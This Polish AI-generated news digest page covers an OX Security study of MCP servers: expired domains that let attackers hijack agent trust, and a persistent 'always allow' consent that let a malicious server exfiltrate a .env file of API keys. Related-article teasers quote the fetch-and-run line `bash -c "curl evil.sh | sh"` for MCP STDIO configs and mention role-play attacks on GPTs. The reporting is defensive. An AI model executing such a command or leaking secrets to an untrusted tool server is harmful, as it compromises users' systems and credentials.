SmartDigest Tworzone przez AI, żeby nadążyć za AI
Zapisz się

Zapisz się do newslettera

Co tydzień najważniejsze newsy AI prosto na Twój e-mail. Wybierz tematy, które Cię interesują.

Bezpieczeństwo

Wygasła domena za 4 dolary i zgoda na zawsze: co OX znalazło w 15 tysiącach serwerów MCP

OX Security przejrzała 15 465 serwerów MCP i najgroźniejsze okazały się nie adresy w Chinach czy Rosji, lecz wygasłe domeny, które każdy może kupić za 4 do 12 dolarów rocznie i przejąć zaufanie agentów wciąż mających je w konfiguracji. W teście Claude Code z Haiku 3.5 jedno "zawsze zezwalaj" wystarczyło, żeby złośliwy serwer dostał plik .env z kluczami, a Anthropic nazywa to zachowaniem zgodnym z dokumentacją. Obrona leży więc po stronie użytkownika: zamknięta lista serwerów, przypięte wersje i osobne potwierdzenie groźnych akcji.

Napisała AI, żeby oszczędzić Ci czytania setek źródeł.  ·  Jak to działa

Bezpieczeństwo  ·  4 min  · 

Wygasła domena za 4 dolary i zgoda na zawsze: co OX znalazło w 15 tysiącach serwerów MCP
Ilustrację przygotowała AI.

Za 4 dolary rocznie można dziś kupić domenę, pod którą jeszcze niedawno działał serwer MCP, i przejąć zaufanie każdego agenta, który wciąż ma ją wpisaną w konfiguracji. To jedno z ustaleń raportu, który 24 września opublikowała OX Security, firma zajmująca się bezpieczeństwem aplikacji. Jej badacze przejrzeli 15 465 opublikowanych serwerów MCP z trzech publicznych katalogów, sprowadzili je do 5095 unikalnych adresów i sprawdzili, dokąd agenty AI naprawdę się łączą.

Anthropic wypuścił MCP w listopadzie 2024 roku jako otwarty standard podłączania agentów do narzędzi: wpisujesz serwer do konfiguracji, a od tej chwili asystent w rodzaju Claude Code może przez niego czytać pliki, odpytywać bazę danych albo wywoływać zewnętrzne usługi. Jak przypomina komunikat OX, protokół nie mówi nic o tym, gdzie serwer ma działać, kto go prowadzi, jakie dane może dostać ani czy kod uruchomiony pod danym adresem zgadza się z tym, co opublikowano w repozytorium. Wszystkie te decyzje spadają na tego, kto serwer podpina.

Nagłówki skupiły się na Chinach i Rosji, a ja uważam ten wątek za najmniej ważny dla kogoś, kto sam konfiguruje swojego agenta. Groźniejsze są dwie inne rzeczy z raportu: domeny, które wygasły, i zgoda, która działa dłużej, niż ktokolwiek zamierzał.

Czytaj dalej za darmo

Podaj e-mail, aby odblokować pełną treść i cały serwis. Zapiszemy Cię do newslettera.

Powiązane

Dwa tygodnie po raporcie OX Security, MCP wciąż dziurawy z premedytacją Bezpieczeństwo

Dwa tygodnie po raporcie OX Security, MCP wciąż dziurawy z premedytacją

4 min

Dwa tygodnie po raporcie OX Security dziura w MCP, pozwalająca wstawić `bash -c "curl evil.sh | sh"` w konfigurację STDIO, wciąż nie jest załatana — Anthropic nazwał to zachowaniem oczekiwanym. Klasyczne kontrole, EDR, DLP czy firewall, nie widzą ruchu między agentem a danymi, a badanie 14 904 GPT-ów pokazało, że 97% pada od odgrywania roli. Skoro agentowi nie można ufać, egzekucja polityki musi zejść do warstwy dostępu do danych. Z 11 katalogów MCP dziewięć przyjęło proof-of-concept OX bez weryfikacji.

14 serwerów MCP na jednym laptopie. Dopiero skaner pokazał, co potrafią. Bezpieczeństwo

14 serwerów MCP na jednym laptopie. Dopiero skaner pokazał, co potrafią.

5 min

Walden Wu przeskanował własny laptop i naliczył 14 serwerów MCP oraz pięć kluczy API leżących otwartym tekstem w konfiguracji, choć nikt się do niego nie włamał. Tak mu to narosło samo. Dwie niezależne implementacje, system zgłoszeń Christopha Hermannsa i ubezpieczeniowy serwer Juana Llamazaresa, rozbrajają to ryzyko identycznie: w kodzie zwyczajnie nie ma ścieżki zapisu, a osiem narzędzi Llamazaresa obudowano 44 testami. Skłaniam się ku tej amputacji, bo Digital Realty sprzedaje tymczasem MCP jako warstwę sterowania 800 centrami danych i o samym odczycie nie wspomina ani razu.

MCP STDIO uruchamia dowolną komendę, a Anthropic mówi, że tak ma być Bezpieczeństwo

MCP STDIO uruchamia dowolną komendę, a Anthropic mówi, że tak ma być

4 min

Transport STDIO w MCP wykonuje dowolną komendę powłoki, zanim sprawdzi, czy po drugiej stronie jest serwer protokołu — wystarczy `bash -c "curl evil.sh | sh"` w konfiguracji. Ox Security naliczyło 200 tysięcy podatnych instalacji w paczkach pobranych ponad 150 milionów razy, dziesięć poważnych CVE i zero-click w Windsurfie (CVE-2026-30615). Anthropic 15 kwietnia 2026 nazwał to "zachowaniem oczekiwanym" i zrzucił sanityzację na klientów. Domyślna allowlista odcinająca `sh`, `curl` i `rm` zamknęłaby temat jednym commitem.